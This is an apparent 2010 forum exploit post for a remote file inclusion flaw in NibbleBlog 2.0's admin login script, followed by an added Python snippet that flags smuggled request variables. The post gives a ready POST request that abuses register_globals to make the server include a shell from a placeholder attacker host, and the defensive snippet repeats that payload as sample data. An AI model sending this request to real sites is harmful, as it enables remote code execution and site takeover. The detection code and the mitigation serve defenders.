
03.06.2010, 13:12
NibbleBlog 2.0 Remote File Inclusion
NibbleBlog 2.0
Site: http://www.nibbleblog.com
Remote File Inclusion
Vuln file: /admin/includes/index_login.php
PHP code:
if($var_url['exe']=='login')
{
    $var_form['login_user'] = (string) $_POST['form_field_user'];
    $var_form['login_password'] = (string) $_POST['form_field_password'];
    if( !empty($var_form['login_user']) && !empty($var_form['login_password']) )
    {
        include($_PATH['shadow.php']);
        /*...*/
A similar vulnerability is in /admin/includes/profile.php
Need: register_globals = On
Exploit:
Code:
POST http://[host]/[path]/admin/includes/index_login.php HTTP/1.0
Content-type: application/x-www-form-urlencoded
var_url[exe]=login&form_field_user=1&form_field_password=1&_PATH[shadow.php]=http://[evil_host]/shell.wtf
__________________
Avant que l'ombre...
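
Added example, not part of the original post or of NibbleBlog: a Python check that a defender could run over captured POST bodies for the login script, flagging any request variable that the form does not define and that register_globals would turn into a PHP global. The function names and the allow-list are assumptions; the field names and the sample body are taken from the post above, placeholders intact.

```python
import re
from urllib.parse import parse_qsl

# Fields the login form legitimately sends (the two $_POST reads in the excerpt).
LOGIN_FIELDS = {"form_field_user", "form_field_password"}

# URL schemes that PHP's include() can resolve through a stream wrapper.
WRAPPER_RE = re.compile(r"^\s*(?:https?|ftps?|php|data|expect|phar|zip)://", re.I)


def base_name(key):
    """Name of the global PHP would create from a request key: 'a[b][c]' -> 'a'."""
    return key.split("[", 1)[0].strip()


def audit_body(body, expected=LOGIN_FIELDS):
    """Return (variable, raw_key, reason) for every parameter outside the allow-list.

    parse_qsl percent-decodes keys and values first, so an encoded
    '%5FPATH%5Bshadow.php%5D' is judged the same way as '_PATH[shadow.php]'.
    """
    findings = []
    for key, value in parse_qsl(body, keep_blank_values=True):
        name = base_name(key)
        if name in expected:
            continue
        reason = "unexpected variable"
        if WRAPPER_RE.match(value):
            reason = "unexpected variable carrying a stream-wrapper URL"
        findings.append((name, key, reason))
    return findings


# Request body from the post above (placeholders as published).
POSTED_BODY = ("var_url[exe]=login&form_field_user=1&form_field_password=1"
               "&_PATH[shadow.php]=http://[evil_host]/shell.wtf")
# Constructed benign login for comparison.
BENIGN_BODY = "form_field_user=admin&form_field_password=s3cret"

if __name__ == "__main__":
    for body in (BENIGN_BODY, POSTED_BODY):
        print(audit_body(body) or "clean")
```

On the PHP side, the same condition is closed by register_globals = Off and by the script assigning $_PATH itself before the include() is reached.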